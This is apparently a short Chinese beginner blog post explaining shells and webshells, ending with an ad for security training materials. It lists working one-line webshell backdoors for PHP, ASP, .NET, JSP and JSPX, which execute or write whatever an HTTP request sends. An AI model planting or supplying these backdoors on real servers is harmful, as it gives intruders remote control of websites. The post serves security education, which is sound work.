“牛逼的Shell和WebShell”
-
- 💻Shell
- 📺webshell
- 📹webshell分类
💻Shell
Shell其实是主机的管理员权限,外行人听着好牛逼。For Example:
- Windows中就是PowerShell
- Linux中就是root权限
📺webshell
WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
📹webshell分类
webshell根据脚本类型可以分为
- PHP脚本木马
`<?php @eval($_POST[value]);?>`
* 1
- ASP脚本木马
`<%execute(request(“value”))%>`
* 1
- .NET脚本木马
`<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"value");%>`
* 1
- JSP脚本木马
`<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>`
* 1
* 2
* 3
- JSPX脚本木马
`<%@ Page Language=“Jscript”%> <%eval(Request.Item[“value”])%>`
* 1
* 2
根据时代和技术的变迁,国外也有用python编写的脚本木马,不过国内常用的无外乎三种,大马,小马,一句话木马。
网络安全工程师(白帽子)企业级学习路线
第一阶段:安全基础(入门)
第二阶段:Web渗透(初级网安工程师)
第三阶段:进阶部分(中级网络安全工程师)
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!